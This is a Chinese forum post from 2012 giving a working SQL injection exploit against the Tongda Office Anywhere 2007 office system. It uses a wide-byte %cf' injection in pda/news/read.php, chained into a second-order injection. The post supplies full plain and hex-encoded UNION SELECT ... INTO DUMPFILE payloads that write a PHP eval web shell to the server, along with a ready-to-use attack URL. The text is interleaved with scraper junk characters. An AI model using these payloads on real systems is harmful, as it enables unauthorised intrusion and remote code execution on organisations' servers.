目前测试通达OA2007版本
; W# \2 {1 f/ g) Q/ ~7 g* w* `, w5 Y, r1 w1 x
6 U9 Y( W1 y" {; d# Q
Office Anywhere 2007 网络智能办公系统
7 P( `# N5 G; b # F- a* v+ m2 P O) B: A
http://127.0.0.1/pda/news/read.php?P=%cf' 猪点。 暴web目录..
, m/ w* R3 i# |( |1 V 6 S3 \7 F! t- r L1 w0 G, v
' X5 @+ R7 j! J5 k7 w; z2 L* ~( v& z# a
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
; s- W" E( X- Y 7 ]1 [& V$ i" F; k1 `1 ]( `" ?
例如:SELECT * from USER where USER_ID='{$USERNAME}' ) s# i/ d6 r) f9 F B& ^
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
, Q5 P) `- Q1 I' n4 W : g; B- x- h3 U6 t: L+ ^- q/ F
这个时候我们是不是可以组合起来使用哪?: j& X2 l0 h) H5 x5 O
& e3 i4 b5 n+ y3 E% y第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
/ h1 G. d' V$ ~% J" m: Y& p7 b/ x$ Munion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
4 s: F T& q" A' ?9 P: Y ) a+ H& c' g6 O7 g# A. E* _$ ]4 S
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
2 X- {9 ?/ N6 ~( }) {- ~4 [ , J5 y% @6 j, S2 s0 G( h t; O
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
; z' @1 {* R4 t) X
3 q0 c Q# S8 a4 s那么我们用字符串格式带入进行hex编码
5 a2 i3 Q8 \* {0 D' {- t3 k e
8 z- J: \; r" p7 t4 v0 M%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23) A; E8 _, x/ Q6 c. B: H
8 g$ l$ H" ]4 W& u8 Z% h测试ok,获取oa的webshell
8 k8 V, e& s. I! r
1 K' b" u9 Y7 h1 w/ ~7 Y5 L
0 e; T3 X ?7 M6 y7 mpda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
1 M* T3 h7 h1 J4 m7 o' I直接getwebshell |
发表于 2012-12-20 08:09:24
收藏
支持
反对